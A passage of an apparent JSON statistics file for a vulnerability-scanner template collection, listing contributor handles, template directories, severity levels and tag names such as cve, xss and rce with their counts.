parzival","count":2},{"name":"pbuff07","count":2},{"name":"cckuakilong","count":2},{"name":"k11h-de","count":2},{"name":"socketz","count":2},{"name":"bmcel","count":2},{"name":"charles d.","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"korteke","count":2},{"name":"666asd","count":2},{"name":"brucelsone","count":2},{"name":"w4cky_","count":2},{"name":"clarkvoss","count":2},{"name":"0xrudra","count":2},{"name":"maximus decimus","count":2},{"name":"manas_harsh","count":2},{"name":"kishore-hariram","count":2},{"name":"kiblyn11","count":2},{"name":"randomdhiraj","count":2},{"name":"sinkettu","count":2},{"name":"sy3omda","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"n-thumann","count":2},{"name":"dahse89","count":2},{"name":"y4er","count":2},{"name":"g4l1t0","count":2},{"name":"danmcinerney","count":2},{"name":"moritz nentwig","count":2},{"name":"afaq","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"usdag","count":2},{"name":"myztique","count":2},{"name":"msegoviag","count":2},{"name":"notnotnotveg","count":2},{"name":"gevakun","count":2},{"name":"bananabr","count":2},{"name":"ree4pwn","count":2},{"name":"0xnirvana","count":2},{"name":"cocxanh","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"0xcrypto","count":2},{"name":"h0j3n","count":2},{"name":"raesene","count":2},{"name":"geekby","count":2},{"name":"mrharshvardhan","count":2},{"name":"redteambrasil","count":2},{"name":"ehsahil","count":2},{"name":"shankaracharya","count":2},{"name":"joshlarsen","count":2},{"name":"thezakman","count":2},{"name":"vavkamil","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"6mile","count":2},{"name":"sascha brendel","count":2},{"name":"zomsop82","count":2},{"name":"thevillagehacker","count":2},{"name":"udit_thakkur","count":2},{"name":"lotusdll","count":2},{"name":"supras","count":2},{"name":"joshua rogers","count":2},{"name":"liwermor","count":2},{"name":"wa1tf0rme","count":2},{"name":"gal nagli","count":2},{"name":"thabisocn","count":2},{"name":"hetroublemakr","count":2},{"name":"paradessia","count":2},{"name":"nkxxkn","count":2},{"name":"0xsmiley","count":2},{"name":"uomogrande","count":2},{"name":"lstatro","count":2},{"name":"ep1csage","count":2},{"name":"github.com/its0x08","count":2},{"name":"x1m_martijn","count":2},{"name":"luqman","count":1},{"name":"arall","count":1},{"name":"miryangjung","count":1},{"name":"aaronchen0","count":1},{"name":"soyelmago","count":1},{"name":"pratik khalane","count":1},{"name":"0xh7ml","count":1},{"name":"millermedia","count":1},{"name":"pepitoh","count":1},{"name":"hczdmr","count":1},{"name":"ilovebinbash","count":1},{"name":"guax1","count":1},{"name":"nagli","count":1},{"name":"yaser_s","count":1},{"name":"hotpot","count":1},{"name":"wabafet","count":1},{"name":"sshell","count":1},{"name":"h4kux","count":1},{"name":"retr02332","count":1},{"name":"ling","count":1},{"name":"high","count":1},{"name":"nytr0gen","count":1},{"name":"godfatherorwa","count":1},{"name":"toufik-airane","count":1},{"name":"jeya.seelan","count":1},{"name":"akshansh","count":1},{"name":"zinminphy0","count":1},{"name":"shivanshkhari","count":1},{"name":"revblock","count":1},{"name":"co0nan","count":1},{"name":"adnanekhan","count":1},{"name":"petruknisme","count":1},{"name":"vulnspace","count":1},{"name":"luqmaan hadia","count":1},{"name":"fpatrik","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"daviey","count":1},{"name":"kiransau","count":1},{"name":"failopen","count":1},{"name":"chron0x","count":1},{"name":"davidfegyver","count":1},{"name":"shiar","count":1},{"name":"manuelbua","count":1},{"name":"bjxsec","count":1},{"name":"prettyboyaaditya","count":1},{"name":"arjunchandarana","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"sherlocksecurity","count":1},{"name":"jfbes","count":1},{"name":"mhdsamx","count":1},{"name":"0xtavian","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"sickwell","count":1},{"name":"tirtha","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ipanda","count":1},{"name":"narluin","count":1},{"name":"hardik-rathod","count":1},{"name":"arr0way","count":1},{"name":"yashgoti","count":1},{"name":"hazana","count":1},{"name":"fopina","count":1},{"name":"tehtbl","count":1},{"name":"x6263","count":1},{"name":"juicypotato1","count":1},{"name":"therealtoastycat","count":1},{"name":"kurohost","count":1},{"name":"ransomsec","count":1},{"name":"dorkerdevil","count":1},{"name":"unp4ck","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"elder tao","count":1},{"name":"youngpope","count":1},{"name":"viniciuspereiras","count":1},{"name":"flag007","count":1},{"name":"majidmc2","count":1},{"name":"rumble773","count":1},{"name":"adrianmf","count":1},{"name":"lady_bug","count":1},{"name":"aayush vishnoi","count":1},{"name":"andirrahmani1","count":1},{"name":"elitebaz","count":1},{"name":"whynotke","count":1},{"name":"pjborah","count":1},{"name":"erethon","count":1},{"name":"freakyclown","count":1},{"name":"sttlr","count":1},{"name":"nobody","count":1},{"name":"af001","count":1},{"name":"mrcl0wnlab","count":1},{"name":"xcapri","count":1},{"name":"screamy","count":1},{"name":"jonathanwalker","count":1},{"name":"egemenkochisarli","count":1},{"name":"ruppde","count":1},{"name":"0xparth","count":1},{"name":"puben","count":1},{"name":"y0no","count":1},{"name":"geraldino2","count":1},{"name":"exid","count":1},{"name":"josecosta","count":1},{"name":"2rs3c","count":1},{"name":"yavolo","count":1},{"name":"ptonewreckin","count":1},{"name":"mantissts","count":1},{"name":"zandros0","count":1},{"name":"ldionmarcil","count":1},{"name":"liquidsec","count":1},{"name":"null_hypothesis","count":1},{"name":"alevsk","count":1},{"name":"compr00t","count":1},{"name":"phillipo","count":1},{"name":"miroslavsotak","count":1},{"name":"exploitation","count":1},{"name":"makyotox","count":1},{"name":"mariam tariq","count":1},{"name":"micha3lb3n","count":1},{"name":"chesterblue","count":1},{"name":"calumjelrick","count":1},{"name":"jcockhren","count":1},{"name":"pphuahua","count":1},{"name":"mubassirpatel","count":1},{"name":"invisiblethreat","count":1},{"name":"jbaines-r7","count":1},{"name":"duty_1g","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"barthy.koeln","count":1},{"name":"jiheon-dev","count":1},{"name":"wlayzz","count":1},{"name":"w0tx","count":1},{"name":"remonsec","count":1},{"name":"ok_bye_now","count":1},{"name":"piyushchhiroliya","count":1},{"name":"aaban solutions","count":1},{"name":"kiks7","count":1},{"name":"mbmy","count":1},{"name":"charanrayudu","count":1},{"name":"kresec","count":1},{"name":"aresx","count":1},{"name":"udyz","count":1},{"name":"secthebit","count":1},{"name":"mayank_pandey01","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"aron molnar","count":1},{"name":"ph33rr","count":1},{"name":"dk999","count":1},{"name":"b4uh0lz","count":1},{"name":"f1she3","count":1},{"name":"spac3wh1te","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"mabdullah22","count":1},{"name":"opencirt","count":1},{"name":"gboddin","count":1},{"name":"shivampand3y","count":1},{"name":"becivells","count":1},{"name":"_darrenmartyn","count":1},{"name":"imhunterand","count":1},{"name":"dabla","count":1},{"name":"pdp","count":1},{"name":"nielsing","count":1},{"name":"ayadi","count":1},{"name":"xshuden","count":1},{"name":"allenwest24","count":1},{"name":"hakimkt","count":1},{"name":"0xprial","count":1},{"name":"ofjaaah","count":1},{"name":"gonski","count":1},{"name":"kr1shna4garwal","count":1},{"name":"eremit4","count":1},{"name":"houdinis","count":1},{"name":"b0rn2r00t","count":1},{"name":"udinchan","count":1},{"name":"sanineng","count":1},{"name":"francescocarlucci","count":1},{"name":"bugvsme","count":1},{"name":"tea","count":1},{"name":"cravaterouge","count":1},{"name":"whotwagner","count":1},{"name":"archer","count":1},{"name":"kchason","count":1},{"name":"queencitycyber","count":1},{"name":"viondexd","count":1},{"name":"shifacyclewla","count":1},{"name":"berkdusunur","count":1},{"name":"d4ly","count":1},{"name":"open-sec","count":1},{"name":"joaonevess","count":1},{"name":"tangxiaofeng7","count":1},{"name":"thelicato","count":1},{"name":"evolutionsec","count":1},{"name":"jc175","count":1},{"name":"am0nt31r0","count":1},{"name":"apt-mirror","count":1},{"name":"j33n1k4","count":1},{"name":"sec_hawk","count":1},{"name":"danigoland","count":1},{"name":"shiva (strobes security)","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"galoget","count":1},{"name":"wpsec","count":1},{"name":"r3s ost","count":1},{"name":"kaizensecurity","count":1},{"name":"carrot2","count":1},{"name":"esonhugh","count":1},{"name":"ramkrishna sawant","count":1},{"name":"elouhi","count":1},{"name":"kagamigawa","count":1},{"name":"kailashbohara","count":1},{"name":"iphantasmic","count":1},{"name":"booboohq","count":1},{"name":"rivalsec","count":1},{"name":"exceed","count":1},{"name":"ohlinge","count":1},{"name":"djoevanka","count":1},{"name":"nerrorsec","count":1},{"name":"mordavid","count":1},{"name":"juliosmelo","count":1},{"name":"_c0wb0y_","count":1},{"name":"lbb","count":1},{"name":"topscoder","count":1},{"name":"dali","count":1},{"name":"patralos","count":1},{"name":"regala_","count":1},{"name":"noah @thesubtlety","count":1},{"name":"babybash","count":1},{"name":"fmunozs","count":1},{"name":"chetgan","count":1},{"name":"yiran","count":1},{"name":"paper-pen","count":1},{"name":"th3.d1p4k","count":1},{"name":"qianbenhyu","count":1},{"name":"michael wedl","count":1},{"name":"jacalynli","count":1},{"name":"oscarintherocks","count":1},{"name":"zsusac","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"mah3sec_","count":1},{"name":"borna nematzadeh","count":1},{"name":"sospiro","count":1},{"name":"d0rkerdevil","count":1},{"name":"olewagner","count":1},{"name":"couskito","count":1},{"name":"mayankpandey01","count":1},{"name":"aravind","count":1},{"name":"httpvoid","count":1},{"name":"anon-artist","count":1},{"name":"byobin","count":1},{"name":"jna1","count":1},{"name":"amirmsafari","count":1},{"name":"deena","count":1},{"name":"danfaizer","count":1},{"name":"ahmed abou-ela","count":1},{"name":"west-wise","count":1},{"name":"un-fmunozs","count":1},{"name":"mr.bobo hp","count":1},{"name":"daffianfo","count":1},{"name":"banana69","count":1},{"name":"_harleo","count":1},{"name":"evan rubinstien","count":1},{"name":"naglis","count":1},{"name":"k3rwin","count":1},{"name":"luskabol","count":1},{"name":"zn9988","count":1},{"name":"sicksec","count":1},{"name":"amanrawat","count":1},{"name":"affix","count":1},{"name":"hlop","count":1},{"name":"patrick pirker","count":1},{"name":"undefl0w","count":1},{"name":"pry0cc","count":1},{"name":"adilsoybali","count":1},{"name":"alex","count":1},{"name":"lark lab","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"izn0u","count":1},{"name":"win3zz","count":1},{"name":"lixts","count":1},{"name":"sak1","count":1},{"name":"ky9oss","count":1},{"name":"ramondunker","count":1},{"name":"erikowen","count":1},{"name":"luciannitescu","count":1},{"name":"husain","count":1},{"name":"sinsinology","count":1},{"name":"hanlaomo","count":1},{"name":"dmartyn","count":1},{"name":"pascalheidmann","count":1},{"name":"carson chan","count":1},{"name":"yuansec","count":1},{"name":"marcio mendes","count":1},{"name":"f0xy","count":1},{"name":"amnotacat","count":1},{"name":"cbadke","count":1},{"name":"jrolf","count":1},{"name":"8authur","count":1},{"name":"momen eldawakhly","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"zhenwarx","count":1},{"name":"0xceba","count":1},{"name":"numan türle","count":1},{"name":"fur1na","count":1},{"name":"jteles","count":1},{"name":"qlkwej","count":1},{"name":"yusakie","count":1},{"name":"ringo","count":1},{"name":"caon","count":1},{"name":"ap3r","count":1},{"name":"mukundbhuva","count":1},{"name":"0xcharan","count":1},{"name":"rschio","count":1},{"name":"intx0x80","count":1},{"name":"harshinsecurity","count":1},{"name":"floriandewald","count":1},{"name":"alexrydzak","count":1},{"name":"bughuntersurya","count":1},{"name":"bad5ect0r","count":1},{"name":"ynnirc","count":1},{"name":"jaskaran","count":1},{"name":"adamparsons","count":1},{"name":"0xceeb","count":1},{"name":"elmahdi","count":1},{"name":"manasmbellani","count":1},{"name":"pussycat0","count":1},{"name":"ola456","count":1},{"name":"christbowel","count":1},{"name":"myst7ic","count":1},{"name":"mihhailsokolov","count":1},{"name":"notwhy","count":1},{"name":"ledoubletake","count":1},{"name":"justmumu","count":1},{"name":"ooooooo_q","count":1},{"name":"zeyad azima","count":1},{"name":"mass0ma","count":1},{"name":"omarjezi","count":1},{"name":"philippdelteil","count":1},{"name":"furkansayim","count":1},{"name":"rodnt","count":1},{"name":"matt miller","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"s1r1us","count":1},{"name":"lamscun","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"vinit989","count":1},{"name":"bjhulst","count":1},{"name":"rotemreiss","count":1},{"name":"0ut0fb4nd","count":1},{"name":"realexp3rt","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thebinitghimire","count":1},{"name":"official_blackhat13","count":1},{"name":"lingtren","count":1},{"name":"xeldax","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"brianlam38","count":1},{"name":"watchtowr","count":1},{"name":"axrk","count":1},{"name":"igibanez","count":1},{"name":"noobexploiter","count":1},{"name":"iampritam","count":1},{"name":"aringo-bf","count":1},{"name":"0xd0ff9","count":1},{"name":"natto97","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"shockwave","count":1},{"name":"mchklt","count":1},{"name":"none","count":1},{"name":"shreyapohekar","count":1},{"name":"akash.c","count":1},{"name":"0xrod","count":1},{"name":"sdcampbell","count":1},{"name":"0xteles","count":1},{"name":"skylark-lab","count":1},{"name":"sorrowx3","count":1},{"name":"domenicoveneziano","count":1},{"name":"kabirsuda","count":1},{"name":"p-l-","count":1},{"name":"bywalks","count":1},{"name":"drfabiocastro","count":1},{"name":"b0yd","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"push4d","count":1},{"name":"marcos_iaf","count":1},{"name":"rubina119","count":1},{"name":"abbas.heybati","count":1},{"name":"act1on3","count":1},{"name":"petergrifin","count":1},{"name":"retr0","count":1},{"name":"notsoevilweasel","count":1},{"name":"th3r4id","count":1},{"name":"carlosvieira","count":1},{"name":"technicaljunkie","count":1},{"name":"andysvints","count":1},{"name":"denandz","count":1},{"name":"schniggie","count":1},{"name":"ahmetpergamum","count":1},{"name":"mammad_rahimzada","count":1},{"name":"dawid-czarnecki","count":1},{"name":"jeya seelan","count":1},{"name":"unblvr1","count":1},{"name":"nuts7","count":1},{"name":"rinolock","count":1},{"name":"harryha","count":1},{"name":"dievus","count":1},{"name":"orpheus","count":1},{"name":"hateshape","count":1},{"name":"amir-h-fallahi","count":1},{"name":"omarkurt","count":1},{"name":"bartu utku sarp","count":1},{"name":"jbertman","count":1},{"name":"pudsec","count":1},{"name":"breno_css","count":1},{"name":"colbyjack1134","count":1},{"name":"irshadahamed","count":1},{"name":"absshax","count":1},{"name":"m0ck3d","count":1},{"name":"vikas kundu","count":1},{"name":"lethargynavigator","count":1},{"name":"jub0bs","count":1},{"name":"hakluke","count":1},{"name":"knassar702","count":1},{"name":"ndmalc","count":1},{"name":"noamrathaus","count":1},{"name":"mlec","count":1},{"name":"miguelsegoviagil","count":1},{"name":"w8ay","count":1},{"name":"xc1ym","count":1},{"name":"rojanrijal","count":1},{"name":"mesaglio","count":1},{"name":"kareemse1im","count":1},{"name":"tim_koopmans","count":1},{"name":"furkansenan","count":1},{"name":"unknown","count":1},{"name":"droberson","count":1},{"name":"alperenkesk","count":1},{"name":"fq_hsu","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"xstp","count":1},{"name":"savik","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"thirukrishnan","count":1},{"name":"5up3r541y4n","count":1},{"name":"yashanand155","count":1},{"name":"stupidfish","count":1},{"name":"tirtha_mandal","count":1},{"name":"r3nz0","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"smaranchand","count":1},{"name":"lrtk-coder","count":1},{"name":"0xkayala","count":1},{"name":"vzamanillo","count":1},{"name":"brabbit10","count":1},{"name":"gpiechnik2","count":1},{"name":"michal-mikolas","count":1},{"name":"hexcat","count":1},{"name":"hyunsoo-ds","count":1},{"name":"metascan","count":1},{"name":"ahmed sherif","count":1},{"name":"osamahamad","count":1},{"name":"infosecsanyam","count":1},{"name":"palanichamy_perumal","count":1},{"name":"dwbzn","count":1},{"name":"shelld3v","count":1},{"name":"1nf1n7y","count":1},{"name":"clment cruchet","count":1},{"name":"blckraven","count":1},{"name":"akokonunes","count":1},{"name":"jas37","count":1},{"name":"phyr3wall","count":1},{"name":"willd96","count":1},{"name":"arqsz","count":1},{"name":"dale clarke","count":1},{"name":"unkl4b","count":1},{"name":"h4sh5","count":1},{"name":"professorabhay","count":1},{"name":"pwnwithlove","count":1},{"name":"0h1in9e","count":1},{"name":"higor melgaço","count":1},{"name":"jaimin gondaliya","count":1},{"name":"s1r1u5_","count":1},{"name":"rotembar","count":1}],"directory":[{"name":"http","count":7417},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":138},{"name":"cloud","count":98},{"name":"code","count":81},{"name":"javascript","count":56},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":11},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1}],"severity":[{"name":"info","count":3657},{"name":"high","count":1703},{"name":"medium","count":1517},{"name":"critical","count":1029},{"name":"low","count":265},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]} +{"tags":[{"name":"cve","count":2490},{"name":"panel","count":1145},{"name":"wordpress","count":976},{"name":"exposure","count":916},{"name":"xss","count":906},{"name":"wp-plugin","count":847},{"name":"osint","count":804},{"name":"tech","count":682},{"name":"lfi","count":658},{"name":"misconfig","count":620},{"name":"edb","count":599},{"name":"rce","count":594},{"name":"packetstorm","count":530},{"name":"wpscan","count":497},{"name":"cve2021","count":491},{"name":"cve2022","count":476},{"name":"wp","count":421},{"name":"cve2023","count":374},{"name":"unauth","count":366},{"name":"sqli","count":357},{"name":"file","count":346},{"name":"authenticated","count":341},{"name":"intrusive","count":300},{"name":"detect","count":283},{"name":"login","count":276},{"name":"kev","count":268},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":222},{"name":"config","count":221},{"name":"top-200","count":215},{"name":"default-login","count":212},{"name":"osint-social","count":210},{"name":"token","count":193},{"name":"network","count":192},{"name":"","count":192},{"name":"apache","count":189},{"name":"devops","count":176},{"name":"cve2018","count":169},{"name":"iot","count":166},{"name":"cve2019","count":165},{"name":"keys","count":155},{"name":"joomla","count":148},{"name":"malware","count":142},{"name":"redirect","count":135},{"name":"aws","count":133},{"name":"cloud","count":132},{"name":"auth-bypass","count":131},{"name":"ssrf","count":119},{"name":"install","count":118},{"name":"phishing","count":117},{"name":"amazon","count":116},{"name":"files","count":113},{"name":"cms","count":112},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"disclosure","count":89},{"name":"aws-cloud-config","count":89},{"name":"linux","count":83},{"name":"code","count":81},{"name":"local","count":80},{"name":"takeover","count":79},{"name":"seclists","count":79},{"name":"privesc","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":71},{"name":"cve2024","count":69},{"name":"oss","count":67},{"name":"cisco","count":66},{"name":"js","count":63},{"name":"adobe","count":62},{"name":"ir","count":61},{"name":"cve2015","count":59},{"name":"huntr","count":59},{"name":"atlassian","count":57},{"name":"cve2016","count":57},{"name":"google","count":56},{"name":"enum","count":56},{"name":"vmware","count":56},{"name":"c2","count":55},{"name":"tenable","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"aem","count":45},{"name":"osint-gaming","count":45},{"name":"jndi","count":44},{"name":"debug","count":44},{"name":"php","count":44},{"name":"cve2014","count":44},{"name":"deserialization","count":43},{"name":"traversal","count":42},{"name":"osint-hobby","count":42},{"name":"generic","count":42},{"name":"plugin","count":42},{"name":"osint-porn","count":42},{"name":"oa","count":42},{"name":"springboot","count":41},{"name":"cnvd","count":40},{"name":"misc","count":39},{"name":"microsoft","count":38},{"name":"injection","count":38},{"name":"kubernetes","count":37},{"name":"listing","count":37},{"name":"jira","count":37},{"name":"cti","count":36},{"name":"ibm","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"ssl","count":33},{"name":"fuzz","count":33},{"name":"miscellaneous","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"dlink","count":30},{"name":"tls","count":30},{"name":"wp-theme","count":30},{"name":"ec2","count":30},{"name":"k8s","count":28},{"name":"gitlab","count":28},{"name":"fortinet","count":28},{"name":"api","count":28},{"name":"citrix","count":27},{"name":"bestwebsoft","count":27},{"name":"proxy","count":27},{"name":"firewall","count":26},{"name":"lfr","count":26},{"name":"cve2012","count":26},{"name":"weaver","count":25},{"name":"ssh","count":25},{"name":"manageengine","count":25},{"name":"zohocorp","count":25},{"name":"osint-business","count":24},{"name":"dns","count":24},{"name":"osint-images","count":24},{"name":"osint-shopping","count":24},{"name":"osint-finance","count":24},{"name":"zoho","count":24},{"name":"stored-xss","count":23},{"name":"audit","count":23},{"name":"admin","count":23},{"name":"yonyou","count":23},{"name":"tomcat","count":23},{"name":"xxe","count":23},{"name":"file-upload","count":23},{"name":"github","count":22},{"name":"s3","count":22},{"name":"prestashop","count":22},{"name":"cicd","count":22},{"name":"printer","count":21},{"name":"msf","count":21},{"name":"weblogic","count":21},{"name":"ecology","count":21},{"name":"dast","count":21},{"name":"jenkins","count":20},{"name":"camera","count":20},{"name":"struts","count":19},{"name":"hp","count":19},{"name":"grafana","count":19},{"name":"wavlink","count":19},{"name":"rukovoditel","count":19},{"name":"ftp","count":19},{"name":"osint-music","count":18},{"name":"coldfusion","count":18},{"name":"cve2011","count":18},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"vpn","count":17},{"name":"node.js","count":17},{"name":"service","count":17},{"name":"confluence","count":17},{"name":"azure","count":17},{"name":"honeypot","count":17},{"name":"mail","count":17},{"name":"nginx","count":17},{"name":"microweber","count":16},{"name":"backup","count":16},{"name":"rconfig","count":16},{"name":"cve2009","count":16},{"name":"jarm","count":16},{"name":"osint-blog","count":16},{"name":"alibaba","count":16},{"name":"status","count":16},{"name":"magento","count":16},{"name":"dashboard","count":15},{"name":"nodejs","count":15},{"name":"cve2008","count":15},{"name":"ruby","count":15},{"name":"woocommerce","count":15},{"name":"zyxel","count":15},{"name":"setup","count":15},{"name":"bypass","count":15},{"name":"tongda","count":15},{"name":"ssti","count":15},{"name":"installer","count":15},{"name":"java","count":15},{"name":"seeyon","count":15},{"name":"backdoor","count":15},{"name":"moosocial","count":15},{"name":"cnvd2021","count":15},{"name":"cve2013","count":15},{"name":"auth","count":14},{"name":"redhat","count":14},{"name":"docker","count":14},{"name":"domainmod","count":14},{"name":"osint-health","count":14},{"name":"smb","count":14},{"name":"node","count":14},{"name":"dell","count":14},{"name":"npm","count":14},{"name":"git","count":14},{"name":"headless","count":14},{"name":"windows","count":14},{"name":"jboss","count":14},{"name":"nagios","count":14},{"name":"icewarp","count":14},{"name":"redis","count":14},{"name":"creds-stuffing","count":14},{"name":"rds","count":14},{"name":"smtp","count":14},{"name":"login-check","count":14},{"name":"osint-art","count":14},{"name":"netgear","count":13},{"name":"hashicorp","count":13},{"name":"airflow","count":13},{"name":"rails","count":13},{"name":"graphql","count":13},{"name":"ivanti","count":13},{"name":"cuppa","count":13},{"name":"abstractapi","count":13},{"name":"osint-political","count":13},{"name":"cuppacms","count":13},{"name":"sonicwall","count":13},{"name":"osint-dating","count":13},{"name":"laravel","count":13},{"name":"mysql","count":13},{"name":"fortigate","count":13},{"name":"postgresql","count":13},{"name":"webserver","count":12},{"name":"vbulletin","count":12},{"name":"zimbra","count":12},{"name":"doppler","count":12},{"name":"newrelic","count":12},{"name":"netsweeper","count":12},{"name":"kafka","count":12},{"name":"info-leak","count":12},{"name":"ofbiz","count":12},{"name":"drupal","count":12},{"name":"cache","count":11},{"name":"django","count":11},{"name":"spring","count":11},{"name":"osint-video","count":11},{"name":"online-fire-reporting","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"prometheus","count":11},{"name":"hikvision","count":11},{"name":"iam","count":11},{"name":"xstream","count":11},{"name":"fastjson","count":11},{"name":"phpmyadmin","count":11},{"name":"jetbrains","count":11},{"name":"phpgurukul","count":11},{"name":"jolokia","count":11},{"name":"iis","count":11},{"name":"glpi","count":10},{"name":"thinkphp","count":10},{"name":"elasticsearch","count":10},{"name":"samsung","count":10},{"name":"solarview","count":10},{"name":"dahua","count":10},{"name":"db","count":10},{"name":"dropbox","count":10},{"name":"sitecore","count":10},{"name":"solr","count":10},{"name":"digitalocean","count":10},{"name":"dedecms","count":10},{"name":"xstream_project","count":10},{"name":"symfony","count":10},{"name":"zabbix","count":10},{"name":"moodle","count":9},{"name":"vcenter","count":9},{"name":"facebook","count":9},{"name":"cnvd2020","count":9},{"name":"exchange","count":9},{"name":"sangfor","count":9},{"name":"lucee","count":9},{"name":"progress","count":9},{"name":"secret","count":9},{"name":"blind","count":9},{"name":"cloudtrail","count":9},{"name":"wso2","count":9},{"name":"elastic","count":9},{"name":"python","count":9},{"name":"sophos","count":9},{"name":"crlf","count":9},{"name":"pfsense","count":9},{"name":"gitea","count":9},{"name":"druid","count":9},{"name":"artica","count":9},{"name":"scada","count":9},{"name":"bitbucket","count":9},{"name":"opencats","count":9},{"name":"versa","count":9},{"name":"firebase","count":9},{"name":"kube","count":9},{"name":"ognl","count":8},{"name":"mlflow","count":8},{"name":"bucket","count":8},{"name":"discord","count":8},{"name":"error","count":8},{"name":"mirai","count":8},{"name":"recon","count":8},{"name":"gateway","count":8},{"name":"console","count":8},{"name":"cisco-switch","count":8},{"name":"microfocus","count":8},{"name":"phpinfo","count":8},{"name":"spotweb_project","count":8},{"name":"osint-news","count":8},{"name":"metadata","count":8},{"name":"hms","count":8},{"name":"config-audit","count":8},{"name":"emerge","count":8},{"name":"phpjabbers","count":8},{"name":"default-page","count":8},{"name":"symantec","count":8},{"name":"atom","count":8},{"name":"unauthenticated","count":8},{"name":"odoo","count":8},{"name":"huawei","count":8},{"name":"oauth","count":8},{"name":"wanhu","count":8},{"name":"nexus","count":8},{"name":"e-office","count":8},{"name":"manager","count":8},{"name":"cloud-enum","count":8},{"name":"go","count":8},{"name":"spotweb","count":8},{"name":"twitter","count":7},{"name":"keking","count":7},{"name":"nortekcontrol","count":7},{"name":"linkedin","count":7},{"name":"gogs","count":7},{"name":"fpd","count":7},{"name":"squirrelmail","count":7},{"name":"telesquare","count":7},{"name":"bloofox","count":7},{"name":"exploitdb","count":7},{"name":"f5","count":7},{"name":"filemanager","count":7},{"name":"instrusive","count":7},{"name":"database","count":7},{"name":"mongodb","count":7},{"name":"oos","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"nagiosxi","count":7},{"name":"websphere","count":7},{"name":"avtech","count":7},{"name":"mobileiron","count":7},{"name":"vms","count":7},{"name":"monstra","count":7},{"name":"rfi","count":7},{"name":"nacos","count":7},{"name":"fortios","count":7},{"name":"ruckus","count":7},{"name":"shopify","count":7},{"name":"blockchain","count":7},{"name":"contec","count":7},{"name":"maps","count":7},{"name":"cacti","count":7},{"name":"joomla\\!","count":7},{"name":"bigip","count":7},{"name":"opensis","count":7},{"name":"activemq","count":7},{"name":"openemr","count":7},{"name":"pmb","count":7},{"name":"landray","count":7},{"name":"solarwinds","count":7},{"name":"moodating","count":7},{"name":"vpc","count":7},{"name":"teamcity","count":7},{"name":"slack","count":7},{"name":"gcp","count":6},{"name":"typo3","count":6},{"name":"splunk","count":6},{"name":"ldap","count":6},{"name":"servicenow","count":6},{"name":"magmi","count":6},{"name":"keycloak","count":6},{"name":"sql","count":6},{"name":"doctor-appointment-system","count":6},{"name":"plesk","count":6},{"name":"elfinder","count":6},{"name":"tikiwiki","count":6},{"name":"jeecg","count":6},{"name":"asp","count":6},{"name":"lfprojects","count":6},{"name":"paypal","count":6},{"name":"liferay","count":6},{"name":"synacor","count":6},{"name":"jamf","count":6},{"name":"zhiyuan","count":6},{"name":"vrealize","count":6},{"name":"express","count":6},{"name":"microstrategy","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"cobbler","count":6},{"name":"advantech","count":6},{"name":"webmin","count":6},{"name":"beyondtrust","count":6},{"name":"flutterwave","count":6},{"name":"server","count":6},{"name":"jetty","count":6},{"name":"chanjet","count":6},{"name":"minio","count":6},{"name":"geoserver","count":6},{"name":"log","count":6},{"name":"rat","count":6},{"name":"asus","count":6},{"name":"cockpit","count":6},{"name":"74cms","count":6},{"name":"kubelet","count":6},{"name":"couchdb","count":6},{"name":"leak","count":6},{"name":"sonarqube","count":6},{"name":"bmc","count":6},{"name":"openvpn","count":6},{"name":"sentry","count":5},{"name":"tenda","count":5},{"name":"apisix","count":5},{"name":"ethereum","count":5},{"name":"adb","count":5},{"name":"10web","count":5},{"name":"cve2007","count":5},{"name":"acm","count":5},{"name":"froxlor","count":5},{"name":"thedigitalcraft","count":5},{"name":"web3","count":5},{"name":"matrix","count":5},{"name":"terramaster","count":5},{"name":"metinfo","count":5},{"name":"craftcms","count":5},{"name":"awstats","count":5},{"name":"react","count":5},{"name":"chamilo","count":5},{"name":"agentejo","count":5},{"name":"avideo","count":5},{"name":"goanywhere","count":5},{"name":"zzzcms","count":5},{"name":"akamai","count":5},{"name":"hpe","count":5},{"name":"voip","count":5},{"name":"elementor","count":5},{"name":"axigen","count":5},{"name":"square","count":5},{"name":"gocd","count":5},{"name":"glpi